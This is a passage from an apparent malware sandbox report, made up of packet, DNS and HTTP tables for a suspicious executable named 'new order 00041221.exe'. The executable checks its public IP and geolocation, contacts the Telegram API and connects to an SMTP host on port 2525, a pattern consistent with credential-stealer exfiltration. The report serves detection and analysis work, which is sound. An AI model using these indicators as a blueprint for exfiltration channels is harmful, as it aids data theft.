                                          Jul 26, 2024 09:03:07.998681068 CEST8049702193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:09.247378111 CEST8049702193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:09.250452042 CEST49706443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:09.250489950 CEST44349706188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:09.250610113 CEST49706443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:09.250868082 CEST49706443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:09.250881910 CEST44349706188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:09.300052881 CEST4970280192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:09.761877060 CEST44349706188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:09.774473906 CEST49706443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:09.774568081 CEST44349706188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:09.919105053 CEST44349706188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:09.919323921 CEST44349706188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:09.919392109 CEST49706443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:09.919786930 CEST49706443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:09.923782110 CEST4970280192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:09.924933910 CEST4970780192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:09.929918051 CEST8049707193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:09.930032969 CEST4970780192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:09.930144072 CEST4970780192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:09.930629015 CEST8049702193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:09.930855036 CEST4970280192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:09.934993029 CEST8049707193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:10.593067884 CEST8049707193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:10.594641924 CEST49709443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:10.594716072 CEST44349709188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:10.594796896 CEST49709443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:10.595124006 CEST49709443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:10.595141888 CEST44349709188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:10.643717051 CEST4970780192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:11.080826998 CEST44349709188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:11.083190918 CEST49709443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:11.083239079 CEST44349709188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:11.215873957 CEST44349709188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:11.215966940 CEST44349709188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:11.216449976 CEST49709443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:11.216864109 CEST49709443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:11.222276926 CEST4971080192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:11.227142096 CEST8049710193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:11.227317095 CEST4971080192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:11.227489948 CEST4971080192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:11.232238054 CEST8049710193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:13.940898895 CEST8049710193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:13.954924107 CEST4971180192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:13.987483025 CEST4971080192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:14.185848951 CEST8049710193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:14.185941935 CEST4971080192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:14.186134100 CEST8049711193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:14.186222076 CEST4971180192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:14.186454058 CEST4971180192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:14.191287041 CEST8049711193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:16.051285028 CEST8049711193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:16.069993019 CEST49712443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:16.070053101 CEST44349712188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:16.070143938 CEST49712443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:16.076559067 CEST49712443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:16.076590061 CEST44349712188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:16.076704979 CEST4971080192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:16.082537889 CEST8049710193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:16.087300062 CEST4971080192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:16.096885920 CEST4971180192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:16.577074051 CEST44349712188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:16.582406998 CEST49712443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:16.582432032 CEST44349712188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:16.719886065 CEST44349712188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:16.719976902 CEST44349712188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:16.720025063 CEST49712443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:16.723089933 CEST49712443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:16.782828093 CEST4971180192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:16.786812067 CEST4971380192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:16.788384914 CEST8049711193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:16.788434982 CEST4971180192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:16.791650057 CEST8049713193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:16.791708946 CEST4971380192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:16.791847944 CEST4971380192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:16.796879053 CEST8049713193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:19.046257019 CEST8049713193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:19.048593044 CEST49714443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:19.048628092 CEST44349714188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:19.048765898 CEST49714443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:19.049093008 CEST49714443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:19.049105883 CEST44349714188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:19.097068071 CEST4971380192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:19.511085987 CEST44349714188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:19.512948036 CEST49714443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:19.512973070 CEST44349714188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:19.632844925 CEST44349714188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:19.632921934 CEST44349714188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:19.632999897 CEST49714443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:19.633580923 CEST49714443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:19.637445927 CEST4971380192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:19.638541937 CEST4971580192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:19.643400908 CEST8049713193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:19.643529892 CEST4971380192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:19.643709898 CEST8049715193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:19.643805027 CEST4971580192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:19.643990040 CEST4971580192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:19.649305105 CEST8049715193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:22.177618027 CEST8049715193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:22.179352999 CEST49716443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:22.179400921 CEST44349716188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:22.179471016 CEST49716443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:22.179747105 CEST49716443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:22.179758072 CEST44349716188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:22.221874952 CEST4971580192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:22.641446114 CEST44349716188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:22.643264055 CEST49716443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:22.643302917 CEST44349716188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:22.790102005 CEST44349716188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:22.790200949 CEST44349716188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:22.790254116 CEST49716443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:22.796539068 CEST49716443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:22.827532053 CEST4971580192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:22.828885078 CEST4971880192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:22.833036900 CEST8049715193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:22.833084106 CEST4971580192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:22.833739042 CEST8049718193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:22.833801031 CEST4971880192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:22.834057093 CEST4971880192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:22.839128971 CEST8049718193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:23.482217073 CEST8049718193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:23.483360052 CEST49720443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:23.483395100 CEST44349720188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:23.483465910 CEST49720443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:23.483668089 CEST49720443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:23.483678102 CEST44349720188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:23.534396887 CEST4971880192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:23.965667009 CEST44349720188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:23.967667103 CEST49720443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:23.967699051 CEST44349720188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:24.118855000 CEST44349720188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:24.119066954 CEST44349720188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:24.119179010 CEST49720443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:24.119705915 CEST49720443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:24.137238026 CEST4971880192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:24.140444040 CEST4972280192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:24.142745972 CEST8049718193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:24.142842054 CEST4971880192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:24.145524979 CEST8049722193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:24.145667076 CEST4972280192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:24.147607088 CEST4972280192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:24.152587891 CEST8049722193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:26.356765985 CEST8049722193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:26.359874010 CEST49725443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:26.359915972 CEST44349725188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:26.360249043 CEST49725443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:26.360435009 CEST49725443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:26.360445976 CEST44349725188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:26.409490108 CEST4972280192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:26.864325047 CEST44349725188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:26.878006935 CEST49725443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:26.878038883 CEST44349725188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:27.017858982 CEST44349725188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:27.017968893 CEST44349725188.114.97.3192.168.2.7
                                          Jul 26, 2024 09:03:27.018022060 CEST49725443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:27.019392014 CEST49725443192.168.2.7188.114.97.3
                                          Jul 26, 2024 09:03:27.043045998 CEST4972280192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:27.048341036 CEST8049722193.122.6.168192.168.2.7
                                          Jul 26, 2024 09:03:27.048403978 CEST4972280192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:27.051434994 CEST49726443192.168.2.7149.154.167.220
                                          Jul 26, 2024 09:03:27.051460028 CEST44349726149.154.167.220192.168.2.7
                                          Jul 26, 2024 09:03:27.051536083 CEST49726443192.168.2.7149.154.167.220
                                          Jul 26, 2024 09:03:27.052506924 CEST49726443192.168.2.7149.154.167.220
                                          Jul 26, 2024 09:03:27.052516937 CEST44349726149.154.167.220192.168.2.7
                                          Jul 26, 2024 09:03:27.673579931 CEST44349726149.154.167.220192.168.2.7
                                          Jul 26, 2024 09:03:27.673825026 CEST49726443192.168.2.7149.154.167.220
                                          Jul 26, 2024 09:03:27.734774113 CEST49726443192.168.2.7149.154.167.220
                                          Jul 26, 2024 09:03:27.734791994 CEST44349726149.154.167.220192.168.2.7
                                          Jul 26, 2024 09:03:27.735407114 CEST44349726149.154.167.220192.168.2.7
                                          Jul 26, 2024 09:03:27.739933968 CEST49726443192.168.2.7149.154.167.220
                                          Jul 26, 2024 09:03:27.780513048 CEST44349726149.154.167.220192.168.2.7
                                          Jul 26, 2024 09:03:27.918943882 CEST44349726149.154.167.220192.168.2.7
                                          Jul 26, 2024 09:03:27.919035912 CEST44349726149.154.167.220192.168.2.7
                                          Jul 26, 2024 09:03:27.919100046 CEST49726443192.168.2.7149.154.167.220
                                          Jul 26, 2024 09:03:27.922861099 CEST49726443192.168.2.7149.154.167.220
                                          Jul 26, 2024 09:03:33.156932116 CEST4970780192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:34.440284014 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:34.445215940 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:34.445343971 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:36.176240921 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:36.176511049 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:36.181655884 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:36.523237944 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:36.523497105 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:36.529000044 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:36.842788935 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:36.843630075 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:36.848593950 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.172761917 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.172775984 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.172787905 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.172964096 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:37.201371908 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:37.206260920 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.523972034 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.527039051 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:37.532322884 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.851963043 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.853307962 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:37.859302998 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:38.166686058 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:38.180031061 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:38.184792995 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:40.522603035 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:40.523319960 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:40.528223991 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:40.842854977 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:40.843704939 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:40.843766928 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:40.850321054 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:40.855396986 CEST252549727203.124.44.4192.168.2.7

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 26, 2024 09:03:05.810882092 CEST5242953192.168.2.71.1.1.1
                                          Jul 26, 2024 09:03:05.818300962 CEST53524291.1.1.1192.168.2.7
                                          Jul 26, 2024 09:03:06.947355032 CEST5002553192.168.2.71.1.1.1
                                          Jul 26, 2024 09:03:06.955200911 CEST53500251.1.1.1192.168.2.7
                                          Jul 26, 2024 09:03:27.042723894 CEST5067953192.168.2.71.1.1.1
                                          Jul 26, 2024 09:03:27.050193071 CEST53506791.1.1.1192.168.2.7
                                          Jul 26, 2024 09:03:33.355645895 CEST5999653192.168.2.71.1.1.1
                                          Jul 26, 2024 09:03:34.363585949 CEST5999653192.168.2.71.1.1.1
                                          Jul 26, 2024 09:03:34.434303999 CEST53599961.1.1.1192.168.2.7
                                          Jul 26, 2024 09:03:34.434468031 CEST53599961.1.1.1192.168.2.7
                                          Jul 26, 2024 09:03:39.604254007 CEST5349769162.159.36.2192.168.2.7
                                          Jul 26, 2024 09:03:40.088443041 CEST6534553192.168.2.71.1.1.1
                                          Jul 26, 2024 09:03:40.096103907 CEST53653451.1.1.1192.168.2.7

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jul 26, 2024 09:03:05.810882092 CEST192.168.2.71.1.1.10x9736Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                          Jul 26, 2024 09:03:06.947355032 CEST192.168.2.71.1.1.10x7fcfStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                          Jul 26, 2024 09:03:27.042723894 CEST192.168.2.71.1.1.10x32a2Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                          Jul 26, 2024 09:03:33.355645895 CEST192.168.2.71.1.1.10x2142Standard query (0)mail.moonbrosurgical.comA (IP address)IN (0x0001)false
                                          Jul 26, 2024 09:03:34.363585949 CEST192.168.2.71.1.1.10x2142Standard query (0)mail.moonbrosurgical.comA (IP address)IN (0x0001)false
                                          Jul 26, 2024 09:03:40.088443041 CEST192.168.2.71.1.1.10xffeStandard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jul 26, 2024 09:03:05.818300962 CEST1.1.1.1192.168.2.70x9736No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 26, 2024 09:03:05.818300962 CEST1.1.1.1192.168.2.70x9736No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                          Jul 26, 2024 09:03:05.818300962 CEST1.1.1.1192.168.2.70x9736No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                          Jul 26, 2024 09:03:05.818300962 CEST1.1.1.1192.168.2.70x9736No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                          Jul 26, 2024 09:03:05.818300962 CEST1.1.1.1192.168.2.70x9736No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                          Jul 26, 2024 09:03:05.818300962 CEST1.1.1.1192.168.2.70x9736No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                          Jul 26, 2024 09:03:06.955200911 CEST1.1.1.1192.168.2.70x7fcfNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                          Jul 26, 2024 09:03:06.955200911 CEST1.1.1.1192.168.2.70x7fcfNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                          Jul 26, 2024 09:03:27.050193071 CEST1.1.1.1192.168.2.70x32a2No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                          Jul 26, 2024 09:03:34.434303999 CEST1.1.1.1192.168.2.70x2142No error (0)mail.moonbrosurgical.com203.124.44.4A (IP address)IN (0x0001)false
                                          Jul 26, 2024 09:03:34.434468031 CEST1.1.1.1192.168.2.70x2142No error (0)mail.moonbrosurgical.com203.124.44.4A (IP address)IN (0x0001)false
                                          Jul 26, 2024 09:03:40.096103907 CEST1.1.1.1192.168.2.70xffeName error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • reallyfreegeoip.org
                                          • api.telegram.org
                                          • checkip.dyndns.org

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.749702193.122.6.168805292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 26, 2024 09:03:05.832084894 CEST151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jul 26, 2024 09:03:06.531081915 CEST320INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:06 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 4f864800286d0022b792a27194a18461
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                          Jul 26, 2024 09:03:06.535823107 CEST127OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Jul 26, 2024 09:03:06.891879082 CEST320INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:06 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 998273e9fd81af013b085cdce1aee904
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                          Jul 26, 2024 09:03:07.992885113 CEST127OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Jul 26, 2024 09:03:09.247378111 CEST320INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:09 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: bedd99471cb74802748ce2acd2fffb61
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.749707193.122.6.168805292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 26, 2024 09:03:09.930144072 CEST127OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Jul 26, 2024 09:03:10.593067884 CEST320INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:10 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 3f08438484c17a4ea8db810717db00ce
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.749710193.122.6.168805292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 26, 2024 09:03:11.227489948 CEST151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jul 26, 2024 09:03:13.940898895 CEST730INHTTP/1.1 502 Bad Gateway
                                          Date: Fri, 26 Jul 2024 07:03:13 GMT
                                          Content-Type: text/html
                                          Content-Length: 547
                                          Connection: keep-alive
                                          X-Request-ID: a3f7163b6b7b98234329adf6a7a6dd02
